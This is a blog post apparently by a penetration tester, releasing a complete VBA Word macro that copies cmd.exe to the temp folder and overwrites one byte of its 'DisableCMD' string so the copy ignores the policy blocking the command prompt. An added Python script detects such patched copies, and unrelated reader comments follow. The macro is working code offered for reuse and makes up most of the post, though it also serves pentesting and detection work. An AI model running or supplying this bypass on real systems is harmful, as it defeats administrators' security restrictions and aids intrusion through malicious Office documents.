DisableCMD - History Repeating
Before I start: this is nothing new! It has actually been known for many years (e.g. http://blog.didierstevens.com/2007/11/28/quickpost-disableamd-disableregistryfools/).
During a pentest I needed to patch cmd.exe to ignore the DisableCMD policy setting. Nothing new, nothing special, but I needed to do it remotely and I had to use VBA/Word macros. Long story short, I decided to release the code, because it's nothing special and the technique is well known.
Here is a short video about it:
VBA Macro to remove DisableCMD CMD.EXE restriction from Max Moser on Vimeo.
Short video showing my VBA byte patcher written to overcome the DisableCMD policy setting. Sorry, but I at least expected fail-safe behavior.
I am not any good at coding VBA, but it might save someone some time. I will add an example.doc on remote-exploit.org as well.
Sub patchcmd()
    ' Copies %WinDir%\system32\cmd.exe to %temp%\dmc.exe and overwrites one byte of the
    ' UTF-16 string "DisableCMD" in the copy, so the copy never finds the policy value.
    Dim Sourcefile As String, Destfile As String, Windir As String, Tempdir As String
    Dim F1 As Integer, F2 As Integer
    Dim bytepattern(19) As Byte    ' "DisableCMD" as UTF-16LE; element 19 stays &H0 (high byte of the last 'D')
    Dim WshShell As Object
    Set WshShell = CreateObject("WScript.Shell")
    Windir = WshShell.ExpandEnvironmentStrings("%WinDir%")
    Tempdir = WshShell.ExpandEnvironmentStrings("%temp%")
    bytepattern(0) = &H44 'D
    bytepattern(1) = &H0
    bytepattern(2) = &H69 'i
    bytepattern(3) = &H0
    bytepattern(4) = &H73 's
    bytepattern(5) = &H0
    bytepattern(6) = &H61 'a
    bytepattern(7) = &H0
    bytepattern(8) = &H62 'b
    bytepattern(9) = &H0
    bytepattern(10) = &H6C 'l
    bytepattern(11) = &H0
    bytepattern(12) = &H65 'e
    bytepattern(13) = &H0
    bytepattern(14) = &H43 'C
    bytepattern(15) = &H0
    bytepattern(16) = &H4D 'M
    bytepattern(17) = &H0
    bytepattern(18) = &H44 'D
    Dim fileoffset As Long
    fileoffset = 0
    Dim patternoffset As Long
    patternoffset = 0
    Dim gotbad As Boolean
    gotbad = False
    Sourcefile = Windir & "\system32\cmd.exe"
    Destfile = Tempdir & "\dmc.exe"
    Dim tmpbyte As Byte
    If Dir(Sourcefile) = "" Then Exit Sub
    FileCopy Sourcefile, Destfile
    F1 = FreeFile
    Open Sourcefile For Binary As F1
    F2 = FreeFile
    Open Destfile For Binary As F2
    While Not EOF(F1)
        gotbad = False
        Get #F1, , tmpbyte
        If tmpbyte = bytepattern(patternoffset) Then
            fileoffset = (Seek(F1) - 1)    ' 1-based position of the matched 'D'
            While (gotbad = False)
                Get #F1, , tmpbyte
                patternoffset = patternoffset + 1
                If tmpbyte = bytepattern(patternoffset) Then
                    If patternoffset > 18 Then
                        'Debug.Print "Found DisableCMD and position: " & fileoffset & "Patching it now"
                        ' Offset +6 is the 'a'; writing &H34 ('4') turns the string into "Dis4bleCMD"
                        Put #F2, fileoffset + 6, &H34
                        Close F1
                        Close F2
                        MsgBox "Yeah, run it from: " & Destfile, vbOKOnly, "CMD.EXE patched"
                        End
                    End If
                Else
                    patternoffset = 0
                    gotbad = True
                End If
            Wend
        End If
    Wend
    Close F1
    Close F2
End Sub
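As an added defender-side example (not part of the original post and not the macro above): a Python integrity check that flags cmd.exe copies whose UTF-16LE "DisableCMD" string was edited in place, such as the "Dis4bleCMD" result the macro produces, and compares any .exe in %TEMP% against the real System32\cmd.exe. The sample byte strings are constructed, and the %TEMP% scan location is an assumption based on where the macro writes dmc.exe.

```python
import hashlib
import os
from pathlib import Path

# cmd.exe stores the policy value name as UTF-16LE ("D\0i\0s\0..."), the same
# byte-pair sequence the VBA macro above searches for.
NEEDLE = "DisableCMD".encode("utf-16-le")

def find_near_matches(data: bytes, needle: bytes = NEEDLE, max_diff: int = 2):
    """Return (offset, differing_bytes) for windows matching needle in all but
    max_diff bytes. An edit confined to one half of the string (the macro changes
    a single byte) is located via the untouched half, then verified in full."""
    half = len(needle) // 2
    cands = set()
    for piece, shift in ((needle[:half], 0), (needle[half:], half)):
        i = data.find(piece)
        while i != -1:
            cands.add(i - shift)
            i = data.find(piece, i + 1)
    hits = []
    for off in sorted(c for c in cands if 0 <= c <= len(data) - len(needle)):
        diff = sum(1 for a, b in zip(data[off:off + len(needle)], needle) if a != b)
        if diff <= max_diff:
            hits.append((off, diff))
    return hits

def assess(data: bytes) -> str:
    """'intact' (exact string present), 'tampered' (only a near match) or 'absent'."""
    hits = find_near_matches(data)
    if any(diff == 0 for _, diff in hits):
        return "intact"
    return "tampered" if hits else "absent"

def check_file(path: Path) -> dict:
    data = path.read_bytes()
    return {"path": str(path), "sha256": hashlib.sha256(data).hexdigest(), "status": assess(data)}

CLEAN_SAMPLE = b"\x90" * 32 + NEEDLE + b"\x00" * 8  # constructed filler, not real cmd.exe bytes
PATCHED_SAMPLE = CLEAN_SAMPLE.replace(b"a\x00", b"4\x00", 1)  # the "Dis4bleCMD" edit the macro makes

if __name__ == "__main__":
    # On Windows, compare every .exe in %TEMP% (where the macro drops dmc.exe) with the real cmd.exe.
    windir, tmp = os.environ.get("WINDIR"), os.environ.get("TEMP")
    if windir and tmp:
        ref = check_file(Path(windir) / "System32" / "cmd.exe")
        for exe in Path(tmp).glob("*.exe"):
            r = check_file(exe)
            rel = "identical to" if r["sha256"] == ref["sha256"] else "differs from"
            print(f"{r['path']}: policy string {r['status']}, {rel} System32\\cmd.exe")
```

A copy reported as "tampered" together with a hash that differs from System32\cmd.exe is the signature this macro leaves behind; a hash mismatch alone may just be a different build.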
5 Comments:
You are a pro in security, MAX!
HELLO, CAN YOU HELP ME WITH BACK TRACK 4?? I CAN'T, JUST THAT I CAN'T FIND SUPPORT, I JUST CAN'T CONNECT TO INTERNET IN WIRED MODE, AND MY CONNECTION IS GOOD, BECAUSE I HAVE WINDOWS TOO, AND IN IT WORKS FINE.. CAN YOU HELP ME PLEASE :D! charlystaff@hotmail.com
I know it's irrelevant, but I started using wyd 0.2 and I see this error:
Can't locate object method "init" via package "wlgmod::doc" (perhaps you forgot to load "wlgmod::doc"?) at Desktop/wyd-0.2/wyd.pl line 284.
I couldn't find anything about it on the net.
I thought maybe you can help me.
Did you solve your problem, Saeed_Mehraban? I am having the same trouble as you did.
Can't locate object method "init" via package "wlgmod::doc" (perhaps you forgot to load "wlgmod::doc"?) at ./wyd-0.2/wyd.pl line 284.
Can someone help or explain what is going wrong?
Thanks